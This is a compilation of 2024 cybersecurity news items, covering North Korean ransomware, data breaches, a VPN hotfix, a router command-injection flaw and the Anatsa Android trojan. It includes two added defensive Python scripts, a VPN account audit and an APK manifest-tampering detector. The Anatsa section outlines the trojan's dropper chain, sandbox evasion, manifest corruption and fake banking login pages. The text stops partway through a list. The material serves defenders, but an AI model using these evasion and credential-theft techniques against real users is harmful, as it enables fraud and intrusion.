“Microsoft assesses that Moonstone Sleet’s objective in deploying the ransomware is financial gain, suggesting the actor conducts cyber operations for both intelligence collection and revenue generation.” FakePenny ransomware demands exorbitant ransoms, with recent demands reaching $6.6 million in Bitcoin. “This is in stark contrast to the lower ransom demands of previous North Korea ransomware attacks, like WannaCry 2.0 and H0lyGh0st,” Microsoft said. Notably, the ransom note used by FakePenny closely resembles the one used in the NotPetya attack, which Microsoft attributes to Seashell Blizzard, its name for the Russian military intelligence-linked group better known as Sandworm, not to a North Korean actor. The overlap therefore points to borrowing of tradecraft across actors rather than to a North Korean lineage for the note.
Moonstone Sleet’s Strategy and Tradecraft
Moonstone Sleet has a diverse set of operations supporting its financial and espionage objectives. The group has been observed creating fake companies, distributing trojanized versions of legitimate tools, and even developing a malicious game to infiltrate targets. Its ability to run concurrent operations and to quickly evolve and adapt its techniques is notable. In early August 2023, Moonstone Sleet delivered a trojanized version of PuTTY, an open-source terminal emulator, through platforms like LinkedIn, Telegram, and freelancing websites. The trojanized software decrypted and executed the embedded malware when the user supplied an IP address and password listed in a text document contained in the malicious ZIP file the threat actor sent. The same technique has been used by another North Korean actor, Diamond Sleet. Moonstone Sleet has also targeted victims with malicious npm packages distributed through freelancing sites and social media; these packages often masqueraded as technical assessments and, when executed, led to additional malware downloads. Since February 2024, Moonstone Sleet has also used a malicious game called DeTankWar to infect devices. The group approached targets posing as a game developer or a fake company, presenting the game as a blockchain project. Upon launching the game, additional malicious DLLs were loaded, executing a custom malware loader known as “YouieLoad,” which performs network and user discovery and browser data collection.
Fake Companies and Work-for-Hire Schemes
Since January 2024, Moonstone Sleet has created several fake companies, including StarGlow Ventures and C.C. Waterfall, to deceive targets. These companies posed as software development and IT service firms, often related to blockchain and AI, to establish trust and gain access to organizations. Moonstone Sleet has also pursued employment at legitimate companies, consistent with reports of North Korea using remote IT workers to generate revenue. The U.S. recently charged members of a North Korean job-fraud network that was amassing funds to support the country's nuclear program; the network scammed more than 300 U.S. companies and accumulated at least $6.8 million. This employment tactic could also provide another avenue for gaining unauthorized access to organizations. Moonstone Sleet’s notable attacks include compromising a defense technology company to steal credentials and intellectual property and deploying ransomware against a drone technology firm. “Despite being new, Moonstone Sleet has demonstrated that it will continue to mature, develop, and evolve, and has positioned itself to be a preeminent threat actor conducting sophisticated attacks on behalf of the North Korean regime.”
Defending Against Moonstone Sleet
To defend against Moonstone Sleet, Microsoft recommends deploying endpoint detection and response (EDR), enabling attack surface reduction rules that block executable content from email clients and webmail, preventing executable files from running unless they meet specific criteria, turning on advanced protection against ransomware, and blocking credential theft from LSASS.
TRC Staffing Data Breach Fallout: Murphy Law Firm Offers Legal Support to Victims
Understanding the Full Extent of the TRC Staffing Data Breach
In response to the TRC Staffing breach, Murphy Law Firm is actively engaging on behalf of those impacted. Its investigation aims to uncover the full extent of the damage and explore avenues for legal recourse, including the possibility of a class action lawsuit. Individuals who have received breach notifications or suspect their information may have been compromised are urged to take action. By visiting the dedicated page at https://murphylegalfirm.com/cases/trc-data-breach/, affected parties can access information regarding their rights and legal options. The repercussions of the breach extend beyond mere inconvenience: with personal and highly confidential information potentially circulating on the dark web, affected individuals face a risk of identity theft. Murphy Law Firm recognizes the urgency of these concerns and is advocating for the rights of those affected.
How Can Victims Join the TRC Staffing Lawsuit?
To join the lawsuit and seek potential compensation, individuals can fill out a contact form provided by Murphy Law Firm. The form asks for essential details such as name, contact information, and whether a breach notification letter was received. Additionally, users can provide any relevant information regarding fraud or suspicious activity they may have experienced. For those seeking guidance or further assistance, Murphy Law Firm can be reached directly via email at abm@murphylegalfirm.com or by phone at (405) 389-4989. Murphy Law Firm is representing the affected individuals through the legal process.
Check Point VPN Fix Released After Researchers Observe Malicious Access Attempts
Identification of Unauthorized Access Attempts to Check Point VPN
On May 24, Check Point identified a small number of login attempts using old VPN local accounts that relied on a password-only authentication method, which the company does not recommend. The company assembled special teams of Incident Response, Research, Technical Services, and Products professionals to investigate these attempts and any other potentially related incidents. Within 24 hours, the teams identified several customers who were subject to similar attempts and notified them accordingly. The teams consider password-only authentication insecure and more susceptible to compromise of network infrastructure, and recommend against relying on it alone for logging into network infrastructure. The teams advised several preventative measures, such as:
- Reviewing and disabling unused local accounts.
- Implementing an additional layer of authentication, such as certificates, to password-only accounts.
- Deploying additional solutions on Security Gateways to automatically block unauthorized access.
- Contacting the Check Point technical support team or a local representative for additional guidance and assistance.
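The following Python script is an added example of the audit those measures describe; it is not Check Point's VPNcheck script or any code from the vendor. It assumes a simplified key=value log line layout (not Check Point's real log schema), a constructed inventory of local accounts, and a fixed "today" for the staleness check. It classifies each password-only local account into one of the three outcomes above (disable, add a certificate, investigate) and flags the two authentication patterns worth escalating: a password-only account probed from several source addresses, and a dormant password-only account that suddenly logs in.

```python
"""
Added example, not Check Point's tooling or log format: audit a VPN gateway's
local accounts and its authentication log for old local accounts that can
authenticate with a password alone. The inventory and the log lines are
CONSTRUCTED for this example and use a simplified key=value layout.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed inventory: account -> (configured auth factors, last successful login or None).
LOCAL_ACCOUNTS = {
    "vpn-admin":   ({"password"}, datetime(2021, 3, 2)),
    "contractor1": ({"password"}, datetime(2024, 5, 20)),
    "ops-alice":   ({"password", "certificate"}, datetime(2024, 5, 23)),
    "svc-backup":  ({"password"}, None),  # never used since creation
}

# Constructed log lines (simplified syslog-style key=value; an assumed format).
LOG_LINES = """\
2024-05-24T02:11:07Z vpn-gw1 auth user=vpn-admin auth_method=password src=203.0.113.10 result=failed
2024-05-24T02:11:09Z vpn-gw1 auth user=vpn-admin auth_method=password src=203.0.113.10 result=failed
2024-05-24T02:11:15Z vpn-gw1 auth user=vpn-admin auth_method=password src=198.51.100.7 result=failed
2024-05-24T02:12:40Z vpn-gw1 auth user=svc-backup auth_method=password src=203.0.113.10 result=success
2024-05-24T08:30:00Z vpn-gw1 auth user=ops-alice auth_method=certificate src=192.0.2.55 result=success
2024-05-24T09:02:13Z vpn-gw1 auth user=contractor1 auth_method=password src=192.0.2.80 result=success
2024-05-24T09:05:00Z vpn-gw1 kernel link up on eth1
""".splitlines()

LINE_RE = re.compile(r"^(?P<ts>\S+) \S+ auth (?P<kv>.*)$")
NOW = datetime(2024, 5, 28)  # assumed "today" for the staleness check


def parse_line(line):
    """Return the key=value fields of one auth event, or None for non-auth lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    fields = dict(kv.split("=", 1) for kv in m.group("kv").split())
    fields["ts"] = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ")
    return fields


def password_only_accounts(accounts=LOCAL_ACCOUNTS):
    """Accounts whose only configured factor is a password."""
    return sorted(name for name, (factors, _) in accounts.items() if factors == {"password"})


def stale_accounts(accounts=LOCAL_ACCOUNTS, now=NOW, max_idle_days=90):
    """Accounts never used, or not used within max_idle_days."""
    cutoff = now - timedelta(days=max_idle_days)
    return sorted(name for name, (_, last) in accounts.items() if last is None or last < cutoff)


def attempts_by_user(lines=LOG_LINES):
    """Aggregate auth events per account: attempt counts and distinct source IPs."""
    stats = defaultdict(lambda: {"attempts": 0, "failed": 0, "success": 0, "sources": set()})
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        s = stats[ev["user"]]
        s["attempts"] += 1
        s["sources"].add(ev["src"])
        if ev["result"] == "success":
            s["success"] += 1
        else:
            s["failed"] += 1
    return dict(stats)


def audit(lines=LOG_LINES, accounts=LOCAL_ACCOUNTS, now=NOW):
    """Map the findings onto the three remediations: disable, add a factor, investigate."""
    weak = set(password_only_accounts(accounts))
    stale = set(stale_accounts(accounts, now))
    stats = attempts_by_user(lines)
    report = {
        "disable": sorted(weak & stale),            # unused and password-only: remove
        "add_second_factor": sorted(weak - stale),  # in use but password-only: add a certificate
        "investigate": [],
    }
    for user in sorted(weak):
        s = stats.get(user)
        if s is None:
            continue
        # A password-only account probed from several sources, or a dormant one that
        # suddenly logs in successfully, is the pattern worth escalating to IR.
        if len(s["sources"]) > 1 or (user in stale and s["success"] > 0):
            report["investigate"].append(user)
    return report


if __name__ == "__main__":
    for key, users in audit().items():
        print(f"{key}: {', '.join(users) or '-'}")
```

On the constructed data, vpn-admin is flagged both for disabling (dormant since 2021) and for investigation (probed from two source addresses), svc-backup for its never-used status and a sudden successful login, and contractor1 only for adding a second factor. Against a real gateway the two inputs to replace are the inventory (export the local user list and its configured factors) and the log parser for the gateway's actual format; the classification logic stays the same.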
Implementing Check Point VPN Hotfix
Check Point released a script to identify potential risks of compromise in its VPN environment. Enterprises can download the VPNcheck_v2.zip archive and follow the steps on the solution page. If the script identifies local accounts with password-only authentication, users can proceed with the installation of the Security Gateway Hotfix. The hotfix is available via the Check Point Upgrade Service Engine (CPUSE) or through manual download. The hotfix adds a new command, blockSFAInternalUsers, to the Security Gateway, allowing admins to block or allow access for internal users with password-only authentication; the default is to block them. After the hotfix is installed, an attempt to connect using password-only authentication is rejected and recorded in the security log as a failed login. As remote operations and online threats rise, organizations must prioritize stronger VPN authentication methods while monitoring for unauthorized attempts to access these environments. Failure to do so can lead to compromised network infrastructure or assets, data breaches, and significant financial and reputational damage.
OpenAI Announces Safety and Security Committee Amid New AI Model Development
OpenAI's Safety and Security Committee Composition and Responsibilities
The safety committee comprises company insiders, including OpenAI CEO Sam Altman, Chairman Bret Taylor, and four OpenAI technical and policy experts. It also features board members Adam D’Angelo, CEO of Quora, and Nicole Seligman, a former general counsel for Sony. "A first task of the Safety and Security Committee will be to evaluate and further develop OpenAI’s processes and safeguards over the next 90 days." The committee is expected to make its recommendations to the board within 90 days, and OpenAI has committed to publicly releasing the recommendations it adopts in a manner consistent with safety and security considerations. The establishment of the committee is a significant step by OpenAI to address concerns about AI safety while maintaining its leadership in AI innovation. By integrating a diverse group of experts and stakeholders into the decision-making process, OpenAI aims to ensure that safety and security remain paramount as it continues to develop cutting-edge AI technologies.
Development of the New AI Model
OpenAI also announced that it has recently started training a new AI model, described as a "frontier model." Frontier models are the most advanced AI systems, capable of generating text, images, video, and human-like conversation from extensive training data. The company also recently launched its newest flagship model, GPT-4o (the 'o' stands for omni), a multilingual, multimodal generative pre-trained transformer. It was announced by OpenAI CTO Mira Murati during a live-streamed demo on May 13 and released the same day. GPT-4o is free to use, with a usage limit that is five times higher for ChatGPT Plus subscribers. GPT-4o has a context window of up to 128,000 tokens, which helps it maintain coherence over longer conversations or documents.
Anatsa Banking Trojan Found in PDF and QR Code Reader Apps on Google Play Store
Distribution and Impact of Anatsa Banking Trojan
Two malicious dropper applications linked to Anatsa were found on the Google Play store. The campaign impersonated PDF reader and QR code reader applications to attract installations; the install count, which had surpassed 70,000 at the time of analysis, further convinced victims of the applications' legitimacy. Anatsa retrieves payloads from command-and-control (C&C) servers to perform additional malicious activities: the dropper application contains encoded links to remote servers from which the next-stage payload is downloaded, along with a configuration file that drives the next stage of the attack.
Anatsa Infection Steps
The Anatsa banking trojan works by employing a dropper application and executing a payload to launch its malicious activities.
Dropper Application:
- The fake QR code application downloads and loads the DEX file.
- The application uses reflection to invoke code from the loaded DEX file.
- Configuration for loading the DEX file is downloaded from the C&C server.
- After downloading the next stage payload, Anatsa performs checks on the device environment to detect analysis environments and malware sandboxes.
- Upon successful verification, it downloads the third and final stage payload from the remote server.
- The malware injects uncompressed raw manifest data into the APK, deliberately corrupting the compression parameters in the manifest file to hinder analysis.
- Upon execution, the malware decodes all encoded strings, including those for C&C communication.
- It connects with the C&C server to register the infected device and retrieve a list of targeted applications for code injections.
- After receiving a list of package names for financial applications, Anatsa scans the device for these applications.
- If a targeted application is found, Anatsa communicates this to the C&C server.
- The C&C server then supplies a counterfeit login page for the banking operation.
- This fake login page, displayed within a JavaScript Interface (JSI) enabled web view, tricks users into entering their banking credentials, which are then transmitted back to the C&C server.
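The manifest-corruption step above (raw manifest bytes whose ZIP headers claim compression) is something an analyst can check for before anything else. The following is an added triage example written for this article, not Cyble's or the original report's code: it builds an APK-shaped zip from constructed sample data in memory, reproduces the tampering on that sample, and flags it.

```python
"""Triage check for an APK whose AndroidManifest.xml entry has corrupted ZIP
compression metadata: raw (stored) manifest bytes while the headers claim
deflate, or local and central headers that disagree on the method.

All input is constructed sample data (a minimal zip laid out like an APK);
no real APK, malware sample or Anatsa artefact is involved.
"""
import io
import struct
import zipfile
import zlib

MANIFEST = "AndroidManifest.xml"
SIG_LOCAL = b"PK\x03\x04"         # local file header signature
SIG_CENTRAL = b"PK\x01\x02"       # central directory header signature
AXML_MAGIC = b"\x03\x00\x08\x00"  # magic of a compiled (binary XML) manifest


def build_sample_apk(stored_manifest: bool = False) -> bytes:
    """Constructed sample: a tiny zip with the two entries every APK has."""
    method = zipfile.ZIP_STORED if stored_manifest else zipfile.ZIP_DEFLATED
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        # A plain-text placeholder stands in for the compiled manifest.
        zf.writestr(MANIFEST, b"<manifest package='sample.app'/>\n" * 8,
                    compress_type=method)
        zf.writestr("classes.dex", b"dex\n035\x00" + b"\x00" * 64,
                    compress_type=zipfile.ZIP_STORED)
    return buf.getvalue()


def _method_field_offsets(blob: bytes, name: str, headers: str):
    """Yield byte offsets of the 'compression method' field for `name` in the
    local header (signature + 8) and/or central directory header (+ 10)."""
    enc = name.encode()
    specs = []
    if headers in ("local", "both"):
        specs.append((SIG_LOCAL, 26, 30, 8))     # name-length, name, method
    if headers in ("central", "both"):
        specs.append((SIG_CENTRAL, 28, 46, 10))
    for sig, len_off, name_off, method_off in specs:
        pos = blob.find(sig)
        while pos >= 0:
            n_len = struct.unpack_from("<H", blob, pos + len_off)[0]
            if blob[pos + name_off:pos + name_off + n_len] == enc:
                yield pos + method_off
            pos = blob.find(sig, pos + 4)


def tamper_manifest_method(blob: bytes, headers: str = "both") -> bytes:
    """Constructed tampering: leave the stored (raw) manifest bytes untouched
    but rewrite the selected header(s) to claim deflate compression."""
    out = bytearray(blob)
    for off in _method_field_offsets(blob, MANIFEST, headers):
        struct.pack_into("<H", out, off, zipfile.ZIP_DEFLATED)
    return bytes(out)


def check_manifest(blob: bytes) -> list:
    """Return findings about the manifest entry; an empty list means it looks sane."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        info = zf.getinfo(MANIFEST)       # parsed from the central directory
        loc = info.header_offset          # start of the local file header
        local_method, n_len, x_len = struct.unpack_from("<H16xHH", blob, loc + 8)
        data_off = loc + 30 + n_len + x_len
        raw = blob[data_off:data_off + info.compress_size]

        if local_method != info.compress_type:
            findings.append("local header and central directory disagree on method")
        if info.compress_type not in (zipfile.ZIP_STORED, zipfile.ZIP_DEFLATED):
            findings.append(f"unexpected compression method {info.compress_type}")
        if info.compress_type == zipfile.ZIP_DEFLATED and (
                raw.startswith(AXML_MAGIC) or raw.startswith(b"<")):
            findings.append("manifest bytes are raw but header claims deflate")
        try:
            if len(zf.read(MANIFEST)) != info.file_size:
                findings.append("decompressed size differs from declared size")
        except (zlib.error, zipfile.BadZipFile, EOFError, NotImplementedError) as exc:
            findings.append(f"manifest does not decompress ({type(exc).__name__})")
    return findings


if __name__ == "__main__":
    print("clean:", check_manifest(build_sample_apk()))
    print("tampered:", check_manifest(tamper_manifest_method(build_sample_apk(True))))
```

Standard unzip tools and some analysis pipelines trust the central directory, so a mismatch or a non-inflating manifest is a strong signal that the sample deserves manual handling rather than automated processing.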
Best Practices to Stop the Anatsa Trojan
To protect against such threats, Cyble's Research and Intelligence Labs suggests following essential cybersecurity best practices:
- Install Software from Official Sources: Only download software from official app stores like the Google Play Store or the iOS App Store.
- Use Reputable Security Software: Ensure devices, including PCs, laptops, and mobile devices, use reputable antivirus and internet security software.
- Strong Passwords and Multi-Factor Authentication: Use strong passwords and enable multi-factor authentication whenever possible.
- Be Cautious with Links: Be careful when opening links received via SMS or emails.
- Enable Google Play Protect: Always have Google Play Protect enabled on Android devices.
- Monitor App Permissions: Be wary of permissions granted to applications.
- Regular Updates: Keep devices, operating systems, and applications up to date.
Black Basta Ransomware Attack: Microsoft Quick Assist Flaw – Source: securityboulevard.com
Source: securityboulevard.com – Author: Wajahat Raja Recent reports claim that the Microsoft Threat Intelligence team stated that a cybercriminal group, identified as Storm-1811, has been exploiting Microsoft’s Quick Assist tool in a series of social engineering attacks. This group is known for deploying the Black Basta ransomware attack. On May 15, 2024, Microsoft released details […]
The entry Black Basta Ransomware Attack: Microsoft Quick Assist Flaw – Source: securityboulevard.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Hacker Claims Ticketmaster Data Breach: 560M User Details and Card Info at Risk
Ticketmaster Data Breach: The Worst Time to Have a Cybersecurity Incident
SpidermanData claims to have access to a staggering 560 million records brimming with personally identifiable information (PII) of customers, including sensitive payment card details. This breach couldn't have come at a worse time for Ticketmaster, coinciding with the onset of several major music festivals scheduled between May 2024 and January 2025. Among these highly anticipated events is the FOREIGNER concert, featuring legendary rock acts led by Mick Jones and Kelly Hansen. The musical act will begin on June 11, 2024, in the United States and will conclude on November 9, 2024. Following suit is the iconic band HEART, set to perform across the United States from July to November 2024, culminating in an international concert in Calgary, AB, Canada. Meanwhile, Allison Russell and Hozier are primed to perform from May to August 2024. Adding to this list of bands performing this year, artists like Ian Munsick, Prateek Kuhad, and Kathleen Hanna will also go on tours across North America between 2024 and 2025. However, the jubilant atmosphere surrounding these events is now overshadowed by the threat of one of the biggest data breaches, threatening millions of users globally. The purportedly compromised data, amounting to a staggering 1.3 terabytes, has been divided into 15 parts, with the hacker offering samples from two segments. One dataset, extracted from a 'PATRON' database, contains a plethora of personal information, including names, addresses, emails, and phone numbers. Meanwhile, the other dataset includes information about customer sales, encompassing crucial details like event IDs and payment methods.
The Aftermath and Industry Implications
SpidermanData has listed the entire dataset for sale, quoting a hefty price tag of USD 500,000, and restricting the sale to a single buyer. The gravity of this situation cannot be overstated, with the compromised data posing significant risks of identity theft, financial fraud, and other criminal activities - something we've already seen in previous data breaches like the MOVEit File Transfer incident. Live Nation Entertainment, the parent company of Ticketmaster, stands as a global juggernaut in the live entertainment domain, organizing and promoting thousands of shows annually across more than 40 countries. Meanwhile, Ticketmaster's pivotal role in facilitating ticket sales for musical and non-musical events highlights its significance within the industry, making it a prime target for cybercriminals seeking to exploit vulnerabilities for personal gain. The current Ticketmaster data breach is not the first time that the organization has faced a cyberattack. In November 2020, the company faced a hefty £1.25 million fine from the Information Commissioner's Office (ICO) following a payment data breach in 2018. The breach, stemming from a vulnerability in a third-party chatbot, compromised the personal and payment details of over nine million customers in Europe, triggering widespread fraud and financial losses. Whether the current data breach represents a resurgence of previously compromised data or the acquisition of freshly stolen data, the origin of the information in the databases remains unclear. Nevertheless, The Cyber Express will be closely monitoring the situation and we'll update this post once we have more information on the Ticketmaster data leak or any official confirmation from the organization.
Cencora Data Breach Far More Widespread than Earlier Thought
- AbbVie Inc.
- Acadia Pharmaceuticals Inc.
- Bayer Corporation
- Bristol Myers Squibb Company and Bristol Myers Squibb Patient Assistance Foundation
- Dendreon Pharmaceuticals LLC
- Endo Pharmaceuticals Inc.
- Genentech, Inc.
- GlaxoSmithKline Group of Companies and the GlaxoSmithKline Patient Access Programs Foundation
- Incyte Corporation
- Marathon Pharmaceuticals, LLC/PTC Therapeutics, Inc.
- Novartis Pharmaceuticals Corporation
- Pharming Healthcare, Inc.
- Regeneron Pharmaceuticals, Inc.
- Sumitomo Pharma America, Inc. / Sunovion Pharmaceuticals Inc.
- Tolmar
Cyber Forensic Findings from the Cencora Data Breach
Cencora detected the cyberattack on February 21, and took immediate action to contain and prevent further unauthorized access. Based on the investigation that likely concluded in April, Cencora said personal information including first name, last name, address, date of birth, health diagnosis, and medications and prescriptions was compromised in the attack. AmerisourceBergen Specialty Group (ABSG), a unit of Cencora, said Friday the breach involved data of a prescription supply program run by the now defunct subsidiary, Medical Initiatives Inc. Further details on how the supply program was exploited remain unclear. The U.S. has been rocked by a host of cybersecurity breaches linked to the healthcare industry in recent days. While the Change Healthcare cyberattack was one of the most notable ones, the Medstar and Ascension breaches have displayed the vulnerability of the healthcare sector to cyberattacks. The latest in the list of healthcare data breaches is the Sav-Rx data breach that compromised the health data of more than 2.8 million people. Cencora's investigation, however, found no connection with other major healthcare cyberattacks and, in its notifications, said it was unaware of any actual or attempted misuse of the stolen data. The company said it has not seen any public disclosure of the stolen data to date. The affected individuals have been offered 24 months of credit monitoring and identity theft remediation services at no cost, and steps have also been taken to harden defenses to prevent such security breaches in the future.
Greek PDPA Fines Ministry of Interior and MEP Asimakopoulou in 'Email-Gate' Scandal
Ministry of Interior Violations and Consequences
The authority found that a file of 25,000 voters registered for the June 2023 elections had been leaked between June 8 and 23, 2023. The list, which included voter emails, was sent to New Democracy's then Secretary for Diaspora Affairs, Nikos Theodoropoulos, by an unknown individual. Theodoropoulos forwarded the file to MEP Asimakopoulou, who used it to send mass campaign emails in violation of data protection laws and basic principles of legality. [Image source: Shutterstock (MEP Anna-Michelle Asimakopoulou)] On receiving the unsolicited emails to their private accounts, several Greek diaspora voters living abroad expressed their surprise on social media and accused the New Democracy MEP of violating the European Union's General Data Protection Regulation (GDPR). The expats questioned how the addresses were obtained by the MEP for use in the email campaigns. Asimakopoulou earlier attempted to refute allegations of violating these data protection laws but was found to have given contradictory explanations about where the addresses used in the mass email campaign had come from. As a result, the Ministry of Interior faces a 400,000-euro fine, while Asimakopoulou faces a 40,000-euro fine. The authority also postponed its verdict on Theodoropoulos and the New Democracy party to examine new claims related to the investigation. The PDPA stated in its investigation that the use of the emails "was in violation of the basic principle of legality, objectivity and transparency of processing, as it was in violation of a series of provisions of the electoral legislation and furthermore could not reasonably be expected." The ministry said it will "thoroughly study" the authority's decision to consider further legal actions.
The "email-gate" scandal has led to significant consequences, including the resignation of the general secretary of the Interior Ministry, Michalis Stavrianoudakis, and the dismissal of Theodoropoulos by New Democracy. Asimakopoulou has announced she will not run in the European Parliament elections. Asimakopoulou is also facing 75 lawsuits by citizens and over 200 lawsuits from the Interior Ministry over the scandal.
Reaction of Opposition Parties to the Investigation Results
Opposition parties are now demanding the resignation of Interior Minister Niki Kerameos following the outcome of the investigation into the unsolicited emails. [Image source: Shutterstock (Interior Minister Niki Kerameos)] The main opposition party SYRIZA released a statement asserting that "private data were being passed around for months among the Interior Ministry, ND, and at least one election candidate," questioning whether the email list had been leaked to other New Democracy candidates by the Interior Ministry. While the Interior Minister might not have been directly involved, SYRIZA claimed that "Kerameos did not have the guts to show up at the Committee on Institutions and Transparency." The Socialist PASOK Party also demanded Kerameos' resignation, adding that the violation demonstrates the government as "incapable of fulfilling the self-evident, as proven by the high fines."
Black Basta Ransomware Attack: Microsoft Quick Assist Flaw
Recent reports claim that the Microsoft Threat Intelligence team stated that a cybercriminal group, identified as Storm-1811, has been exploiting Microsoft’s Quick Assist tool in a series of social engineering attacks. This group is known for deploying the Black Basta ransomware attack. On May 15, 2024, Microsoft released details about how this financially motivated group […]
The post Black Basta Ransomware Attack: Microsoft Quick Assist Flaw appeared first on TuxCare.
The post Black Basta Ransomware Attack: Microsoft Quick Assist Flaw appeared first on Security Boulevard.
TP-Link Resolves High-Stakes Vulnerability in Archer C5400X Gaming Router
The Timeline of TP-Link Archer C5400X Vulnerability Exposure
According to ONEKEY Research Lab, the TP-Link Archer C5400X vulnerability was initially reported on February 16, 2024, with the submission of a detailed report to TP-Link's PSIRT. Following the report, TP-Link promptly initiated a case on February 19. [Image source: ONEKEY] After collaborative efforts and validation processes, TP-Link shared a beta version of 1.1.7p1 on April 10 for further testing, culminating in the confirmation and release of the patch by ONEKEY on May 27, 2024. The vulnerability exposed a critical flaw in the TP-Link Archer C5400X gaming router, rendering it susceptible to remote command execution. This exploit granted unauthorized users the ability to execute arbitrary commands on the device, posing security risks to users' data and network integrity. "It seems the need to provide a wireless device configuration API at TP-Link had to be answered either fast or cheap, which ended up with them exposing a supposedly limited shell over the network that clients within the router could use as a way to configure wireless devices," said OneKey in the advisory.
Understanding the TP-Link Archer C5400X Vulnerability
[Image source: TP-Link] Central to this TP-Link Archer C5400X vulnerability is the rftest binary, launched during the device's initialization sequence. This binary, responsible for wireless interface self-assessment, inadvertently exposes a network service vulnerable to unauthenticated command injection. Attackers can leverage this vulnerability to remotely execute commands with elevated privileges, potentially compromising the device and its connected network. To mitigate the risk posed by this vulnerability, users are strongly advised to upgrade their devices to version 1_1.1.7. TP-Link has implemented fixes to prevent command injection through shell meta-characters, thereby enhancing the security posture of affected devices. However, users must remain vigilant and proactive in ensuring their devices are up to date with the latest firmware releases to safeguard against emerging threats.
Exposing Recent Vulnerabilities in Routers
The TP-Link Archer C5400X router vulnerability is just one of the cases where a flaw was exploited without a third-party breach. Previously, CISA flagged two end-of-life D-Link routers, adding them to their Known Exploited Vulnerabilities catalog. The router vulnerabilities, CVE-2014-100005 and CVE-2021-40655, affected three main products, DIR-600, DIR-605, and DIR-605L. Exploitation of these vulnerabilities allowed unauthorized configuration changes and the theft of usernames and passwords. The Cyber Security Agency of Singapore also highlighted these two vulnerabilities, stating that the mitigation strategy to avoid exploitation is to "retire and replace their devices with products that are supported by the manufacturer."
Alert: Google Chrome Zero-Day Patch Fixes Critical Flaw
In recent cybersecurity news, Google has swiftly addressed a critical security concern by releasing an emergency update for its Chrome browser. This update targets the third zero-day vulnerability detected in less than a week. Let’s have a look at the details of this Google Chrome zero-day patch and understand its implications for user safety. […]
The post Alert: Google Chrome Zero-Day Patch Fixes Critical Flaw appeared first on TuxCare.
The post Alert: Google Chrome Zero-Day Patch Fixes Critical Flaw appeared first on Security Boulevard.
Pakistan’s Islamabad’s Safe City Authority Online System Down After Hack
Islamabad's Safe City Authority Breach and Initial Response
The breach revealed several systemic weaknesses within the Safe City Authority's digital infrastructure. Hackers successfully infiltrated the primary server, gaining unauthorized access to databases containing criminal records and sensitive information. While the system's firewall did issue an alert upon detecting the intrusion, the absence of backup servers and contingency plans forced a complete shutdown of the affected software and applications. The assault compromised several integral systems, including the Complaint Management System, Criminal Management Record System, and Human Resource Management System, along with software and applications vital for the Operation Division. [Image source: china.aiddata.org] The compromise of these systems impacted several critical services tied to the Safe City initiative. This includes mobile applications, smart police vehicle records, police station data, video analytics, Islamabad Traffic Police, e-challan systems, and records from the operations division. Approximately 13 to 15 servers provided by the police facilitation center F-6 were also affected. An officer highlighted to Dawn, Pakistan's largest English newspaper, that this incident was not a typical hacking scenario involving stolen login credentials. Instead, the system's vulnerability stemmed from the use of simple and common login IDs and passwords by officials, making it easier for hackers to gain access. Additionally, many of the software and applications were found to be outdated or with expired licenses, further compromising the system's security. Despite the breach of several systems, the Safe City cameras' management system, which operated independently over offline direct lines, remained secure, demonstrating the effectiveness of isolated systems in safeguarding against such attacks.
Police spokesperson Taqi Jawad confirmed the intrusion as an attempted breach that triggered the firewall's alarm but stated that appropriate precautionary measures had been taken. "All logins have been closed for the past two days to change them, including those of police stations and officers at various ranks," he stated. Jawad refrained from sharing further specifics on the server shutdowns as he stated they were still pending technical feedback.
Controversy Over Islamabad's Safe City Authority
Islamabad's Safe City project has been a source of serious controversy, with several litigations over contract transparency and cost inflation, leading to the Supreme Court's order to cancel the initial contract with Huawei in 2012. The contract was later renegotiated, and the project resumed under the PMLN (Pakistan Muslim League) government, with the command center becoming operational in 2016. By 2016, 1,805 cameras were installed, and as of 2021, 95% remained functional. Despite the extensive infrastructure, police sources claimed in 2022 that the system had not prevented any incidents or facilitated any arrests, raising questions about its effectiveness. Due to financial strain, Pakistan and China Eximbank signed several debt suspension agreements from July 2020 to December 2021, temporarily suspending principal and interest payments under the concessional loan agreement. Tragically, the project's director was found dead in July 2022 in an apparent suicide. The successful breach of the authority's systems draws additional controversy towards the project, which was intended to be a cornerstone of Islamabad's security infrastructure but has encountered several operational, legal, and financial setbacks.
Federal Court Denies Optus Appeal to Withhold Deloitte Report on 2022 Cyberattack
Optus Appeal Against Sharing External Deloitte Report
The data breach incident, along with a 14-hour outage of its telecommunication services, frustrations over the availability of information and credit monitoring services, and attempts by attackers to exploit the compromised data in SMS phishing attacks, led to intense scrutiny of the company. [Image source: www.optus.com.au/support/cyberresponse] The company commissioned an independent external forensic review of the cyberattack from Deloitte over its security systems, controls and processes on the advice of the then CEO Kelly Bayer Rosmarin and with the approval of its board. Bayer made the following statement over the decision: "This review will help ensure we understand how it occurred and how we can prevent it from occurring again. It will help inform the response to the incident for Optus. This may also help others in the private and public sector where sensitive data is held and risk of cyberattack exists." Kelly later resigned over the incident, with Optus now being led by a new CEO, who is working to rebuild trust with customers in a 'challenging' market. Despite the efforts of the company to deal with the data breach, the recent court decision comes after Optus appealed an earlier ruling that it must hand over the report to Slater & Gordon, the law firm pursuing a class action against the company for allegedly failing to protect its customers' personal information. Optus has not yet made a public statement regarding the Federal Court's decision. However, the company had previously argued that the Deloitte report was commissioned to provide legal advice and therefore it was privileged. The court, however, decided that Optus had failed to prove that the dominant purpose of the report was for legal advice.
Class Action Law Suit Against Optus and Implications of Court Ruling
Slater & Gordon, the law firm representing the affected Optus customers, has welcomed the court's decision. The law firm's class actions practice group leader, Ben Hardwick, criticized Optus's efforts to keep the report confidential, stating that it indicates the company's refusal to accept responsibility for its role in the data breach and its impact on millions of its customers. In its April 2023 press release, the law firm's leader had stated that more than 100,000 of Optus's current and former customers had registered for the class action, with some notable examples among the group such as:
- a domestic violence victim who spent money that was intended for counselling for her children on increasing security measures around the house, including installing video cameras and extra locks on doors and windows
- a former Optus customer who had previously been burgled and had his identity stolen who now suffers severe anxiety after learning his personal information had been shared online
- a stalking victim who takes extreme measures to maintain her privacy, especially her address, who fears her life has genuinely been put in danger by the data breach
- a woman who is now too fearful to answer the telephone after noticing an increase in scam phone calls following the Optus cyberattack, and
